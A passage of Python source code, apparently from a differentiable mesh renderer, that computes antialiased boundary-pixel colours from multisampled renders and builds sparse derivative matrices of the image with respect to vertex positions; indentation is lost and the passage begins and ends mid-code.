frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][frontFacing]
vertsPerFaceProjBnd = self.camera.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 2])
vertsPerFaceProjBnd = np.tile(vertsPerFaceProjBnd, [self.nsamples, 1,1])
vertsPerFaceProjBnd = vertsPerFaceProjBnd.reshape([-1,3,2])[facesOutsideBnd.ravel()]
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_edge = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_edge[t_area_bnd_edge > 1] = 1
# if self.debug:
# import pdb; pdb.set_trace()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_outside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_outside[t_area_bnd_outside > 1] = 1
faces = f[sampleFaces[facesInsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_inside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_inside[t_area_bnd_inside > 1] = 1
#Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamplesOutside[:,0,:]
p2 = vertsProjBndSamplesOutside[:,1,:]
p = sampleV[facesOutsideBnd]
l = (p2 - p1)
linedist = np.sqrt((np.sum(l**2,axis=1)))[:,None]
self.linedist = linedist
lnorm = l/linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:,0]* lnorm[:,0] + v1[:,1]* lnorm[:,1]
self.d = d
intersectPoint = p1 + d[:,None] * lnorm
self.intersectPoint = intersectPoint
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12**2,axis=1)))[:,None]
lnorm12 = l12/linedist12
d2 = v2[:,0]* lnorm12[:,0] + v2[:,1]* lnorm12[:,1]
nonIntersect = (d2 < 0) | (d<0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamplesOutside[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n=lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint /dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final/max_nx_ny
# d_final = d_final
verticesBnd = self.v.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2 , 3])
verticesBndSamples = np.tile(verticesBnd[None,:,:],[self.nsamples,1,1, 1])
verticesBndOutside = verticesBndSamples[facesOutsideBnd]
vc = self.vc.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2 , 3])
vc[vc > 1] = 1
vc[vc < 0] = 0
vcBnd = vc
vcBndSamples = np.tile(vcBnd[None,:,:],[self.nsamples,1,1,1])
vcBndOutside = vcBndSamples[facesOutsideBnd]
invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
#
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
verticesBndOutside = np.concatenate([verticesBndOutside.reshape([-1,3]), np.ones([verticesBndOutside.size//3, 1])], axis=1)
projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndOutside.T).T[:,:3].reshape([-1,2,3])
projVerticesBndDir = projVerticesBndOutside[:,1,:] - projVerticesBndOutside[:,0,:]
projVerticesBndDir = projVerticesBndDir/np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
dproj = (intersectPoint[:,0]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,0]) / (projVerticesBndDir[:,0] - projVerticesBndDir[:,2]*intersectPoint[:,0])
# Code to check computation that dproj == dprojy
# dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
projPoint = projVerticesBndOutside[:,0,:][:,: ] + dproj[:,None]*projVerticesBndDir[:,:]
projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0],1])], axis=1)
viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4,-1])).reshape([4,-1])).T[:,:3]
barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:], axis=1)
barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
# Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
barycentricVertsDistEdge = np.linalg.norm(verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:] - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]],1)
barycentricVertsIntersect = barycentricVertsDistIntesect2 / (barycentricVertsDistIntesect + barycentricVertsDistIntesect2)
barycentricVertsIntersect[nonIntersect] = np.array(argminDistNonIntersect == 0).astype(np.float64)
self.barycentricVertsIntersect = barycentricVertsIntersect
self.viewPointIntersect = viewPointIntersect
self.viewPointIntersect[nonIntersect] = verticesBndOutside.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()), argminDistNonIntersect, :]
vcEdges1 = barycentricVertsIntersect[:, None] * vcBndOutside.reshape([-1, 2, 3])[:, 0, :]
self.barycentricVertsIntersect = barycentricVertsIntersect
vcEdges2 = (1-barycentricVertsIntersect[:,None]) * vcBndOutside.reshape([-1,2,3])[:,1,:]
#Color:
colorVertsEdge = vcEdges1 + vcEdges2
#Point IN edge barycentric
d_finalNP = np.minimum(d_final.copy(),1.)
self.d_final_outside = d_finalNP
self.t_area_bnd_outside = t_area_bnd_outside
self.t_area_bnd_edge = t_area_bnd_edge
self.t_area_bnd_inside = t_area_bnd_inside
areaWeights = np.zeros([nsamples, nBndFaces])
areaWeights[facesOutsideBnd] = (1-d_finalNP)*t_area_bnd_edge + d_finalNP *t_area_bnd_outside
areaWeights[facesInsideBnd] = t_area_bnd_inside
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeightsTotal = areaWeightsTotal
finalColorBndOutside = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndOutside_edge = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndInside = np.zeros([self.nsamples, boundaryFaces.size, 3])
sampleColorsOutside = sampleColors[facesOutsideBnd]
self.sampleColorsOutside = sampleColors.copy()
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside / self.nsamples
self.finalColorBndOutside_for_dr = finalColorBndOutside.copy()
# finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None] * t_area_bnd_outside[:, None]
finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None]
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge/ self.nsamples
self.finalColorBndOutside_edge_for_dr = finalColorBndOutside_edge.copy()
# finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None]) * t_area_bnd_edge[:, None]
finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None])
sampleColorsInside = sampleColors[facesInsideBnd]
self.sampleColorsInside = sampleColorsInside.copy()
# finalColorBndInside[facesInsideBnd] = sampleColorsInside * self.t_area_bnd_inside[:, None]
finalColorBndInside[facesInsideBnd] = sampleColorsInside / self.nsamples
# finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
# finalColorBnd /= areaWeightsTotal[None, :, None]
bndColorsImage = np.zeros_like(self.render_resolved)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
# bndColorsImage1 = np.zeros_like(self.render_resolved)
# bndColorsImage1[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_for_dr, axis=0)
#
# bndColorsImage2 = np.zeros_like(self.render_resolved)
# bndColorsImage2[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_edge_for_dr, axis=0)
#
# bndColorsImage3 = np.zeros_like(self.render_resolved)
# bndColorsImage3[(zerosIm * boundaryImage), :] = np.sum(finalColorBndInside, axis=0)
finalColorImageBnd = bndColorsImage
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
# finalColor1 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage1
# finalColor2 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage2
# finalColor3 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage3
else:
finalColor = self.color_image
finalColor[finalColor>1] = 1
finalColor[finalColor<0] = 0
return finalColor
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
finalColorBndOutside_for_dr = self.finalColorBndOutside_for_dr
finalColorBndOutside_edge_for_dr = self.finalColorBndOutside_edge_for_dr
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility!=4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage)&(visibility !=4294967295 )]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
p1 = vertsProjBndSamplesOutside[:, 0, :]
p2 = vertsProjBndSamplesOutside[:, 1, :]
p = sampleV[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
#Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamplesOutside)
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV[facesOutsideBnd])
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final_np = dist / max_dx_dy
d_final_np = dist
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp1
dipdp2 = (dddp2[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp2
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:,None]
dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
argmax_nx_ny = np.argmax(np.abs(n_norm),axis=1)
dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp1[np.arange(len(dn_normdp1)),argmax_nx_ny]
dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp2[np.arange(len(dn_normdp2)),argmax_nx_ny]
# dd_final_dp1 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p1 * dist + 1./max_dx_dy[:,None] * ddistdp1
# dd_final_dp2 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p2 * dist + 1./max_dx_dy[:,None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
#For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect==0]
v1_norm = v1/np.sqrt((np.sum(v1**2,axis=1)))[:,None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect==1]
v2_norm = v2/np.sqrt((np.sum(v2**2,axis=1)))[:,None]
dd_final_dp2_nonintersect = -v2_norm
dd_final_dp1[nonIntersect][argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersect][argminDistNonIntersect == 1] = 0
dd_final_dp2[nonIntersect][argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersect][argminDistNonIntersect == 0] = 0
dImage_wrt_outside_v1 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp1[:,None,:] - dd_final_dp1[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
dImage_wrt_outside_v2 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp2[:,None,:] - dd_final_dp2[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*2)).ravel()
# faces = f[sampleFaces[facesOutsideBnd]].ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1,0,2])
data2 = dImage_wrt_outside_v2.transpose([1,0,2])
data = np.concatenate([data1[:,:,None,:], data2[:,:,None,:]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
######## 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
######## 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0,1)
dImage_wrt_bar_v[facesOutsideBnd.ravel()] = dImage_wrt_bar_v[facesOutsideBnd.ravel()] * d_final_outside[:,None,None, None] * self.t_area_bnd_outside[:, None, None, None]
dImage_wrt_bar_v[facesInsideBnd.ravel()] = dImage_wrt_bar_v[facesInsideBnd.ravel()] * self.t_area_bnd_inside[:, None, None, None]
# dImage_wrt_bar_v /= np.tile(areaWeightsTotal[None,:], [self.nsamples,1]).ravel()[:, None,None, None]
dImage_wrt_bar_v /= self.nsamples
### Derivatives wrt V: 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.tile(dImage_wrt_bar_v[facesOutsideBnd.ravel()][None,:],[3,1,1,1]).ravel()
data = np.transpose(dImage_wrt_bar_v[facesOutsideBnd.ravel()],[1,0,2,3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
### Derivatives wrt V: 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v[facesInsideBnd.ravel()], [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_inside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
####### 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(np.bool)].astype(np.bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][frontFacing]
verticesBnd = self.v.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 3])
verticesBnd = np.tile(verticesBnd, [self.nsamples, 1,1])
verticesBnd = verticesBnd.reshape([-1,3,3])[facesOutsideBnd.ravel()].reshape([-1,3])
verts = self.viewPointIntersect
fFrontEdge = np.tile(f[frontFacingEdgeFaces][None,:], [self.nsamples, 1, 1]).reshape([-1,3])[facesOutsideBnd.ravel()]
dImage_wrt_bar_v_edge = self.barycentricDerivatives(verticesBnd, fFrontEdge, verts).swapaxes(0, 1)
dImage_wrt_bar_v_edge = dImage_wrt_bar_v_edge * (1-d_final_outside[:,None,None, None]) * self.t_area_bnd_edge[:, None, None, None]
# dImage_wrt_bar_v_edge /= np.tile(self.areaWeightsTotal[None,:], [self.nsamples,1])[facesOutsideBnd][:, None, None,None]
dImage_wrt_bar_v_edge /= self.nsamples
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3 * 2)).ravel()
# faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = f[frontFacingEdgeFaces]
faces = np.tile(faces.reshape([1, -1, 3]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v_edge, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside_edge = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1,3,2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd> 1] = 1
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :,None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
didp = didp * t_area_nonbnd[None,:,None, None]
n_channels = np.atleast_3d(observed).shape[2]
shape = visibility.shape
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.concatenate(((visTriVC[:,0,:] * dBar1dx[:,None])[:,:,None],(visTriVC[:, 0, :] * dBar1dy[:, None])[:,:,None], (visTriVC[:,1,:]* dBar2dx[:,None])[:,:,None], (visTriVC[:, 1, :] * dBar2dy[:, None])[:,:,None],(visTriVC[:,2,:]* dBar3dx[:,None])[:,:,None],(visTriVC[:, 2, :] * dBar3dy[:, None])[:,:,None]),axis=2).swapaxes(0,1).ravel()
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
# result_wrt_verts_nonbnd.sum_duplicates()
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd_outside + result_wrt_verts_bar_outside + result_wrt_verts_bar_inside + result_wrt_verts_bar_outside_edge + result_wrt_verts_nonbnd
# result_wrt_verts = result_wrt_verts_bnd_outside
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
